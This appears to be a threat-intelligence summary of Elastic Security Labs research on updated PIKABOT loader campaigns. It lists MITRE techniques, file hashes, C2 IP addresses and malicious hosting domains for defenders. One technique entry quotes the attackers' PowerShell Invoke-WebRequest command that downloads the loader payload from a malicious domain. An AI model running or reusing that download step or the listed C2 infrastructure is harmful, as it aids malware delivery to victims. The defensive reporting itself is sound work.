Threat Research

PIKABOT, I choose you! — Elastic Security Labs

Securonix

PIKABOT is a widely deployed loader used by attackers to distribute payloads such as Cobalt Strike or ransomware, with Elastic Security Labs reporting new campaigns and an updated loader featuring a new unpacking method and heavier obfuscation. The update signals a potentially evolving codebase that may break signatures and tooling, while highlighting a shift toward in-memory loading, runtime plaintext config, and anti-debugging measures. Hashtags: #PIKABOT #ElasticSecurityLabs #grepWinNP3 #gloverstech #entrevientos

Keypoints

  • Fresh PIKABOT campaigns with substantial loader/core updates
  • New unpacking technique that assembles base64-encoded chunks from the .data section
  • Core changes include reduced obfuscation, in-line RC4, plaintext runtime config, and removal of AES in network traffic
  • Loader stage 2 is decrypted and reflectively loaded into memory to avoid disk writes
  • Anti-debugging and syscall-based techniques are employed to evade EDR and analysis
  • Extensive initial collection and covert C2 communication over HTTPS on non-standard ports

MITRE Techniques

  • [T1059.001] PowerShell – Used to download and execute PIKABOT’s loader via a PowerShell command; “Below are the contents of the obfuscated JavaScript file, showing the next sequence to download and execute PIKABOT’s loader using PowerShell.”
  • [T1105] Ingress Tool Transfer – The loader download/use of remote payloads via a PowerShell web request; “powershell Invoke-WebRequest https://gloverstech[.]com/tJWz9/0.2343379541861872.dat -OutFile …”
  • [T1036] Masquerading – Masquerading as a legitimate tool (grepWinNP3.exe) to appear authentic; “tampered with a legitimate search and replace tool called grepWinNP3.exe …”
  • [T1055.012] Reflective Code Loading – Stage 2 payload is loaded reflectively into the running process, avoiding disk writes; “reflectively load the PE file within the confines of the currently executing process.”
  • [T1082] System Information Discovery – Initial collection of victim machine information (username, computer name, processor, memory, etc.) for fingerprinting; “collecting victim machine information and placing the data into a custom structure…”
  • [T1057] Process Discovery – Process information enumeration using CreateToolhelp32Snapshot/Process32FirstW/Process32NextW; “to retrieve process information”
  • [T1071.001] Web Protocols – Network communication over HTTPS on non-traditional ports using a custom user-agent; “Network communication over HTTPS on non-traditional ports (2967, 2223, etc)”

Indicators of Compromise

  • [SHA-256] 2f66fb872c9699e04e54e5eaef982784b393a5ea260129a1e2484dd273a5a88b – Opc.zip (Zip archive holding obfuscated Javascript)
  • [SHA-256] ca5fb5814ec62c8f04936740aabe2664b3c7d036203afbd8425cd67cf1f4b79d – grepWinNP3.exe (PIKABOT loader)
  • [ipv4-addr] 139.84.237.229:2967 – PIKABOT C2 server
  • [ipv4-addr] 158.220.80.167:2967 – PIKABOT C2 server
  • [domain] gloverstech[.]com – Hosting infra for PIKABOT loader
  • [domain] entrevientos.com[.]ar – Hosting infra for ZIP archive

Read more: https://www.elastic.co/security-labs/pikabot-i-choose-you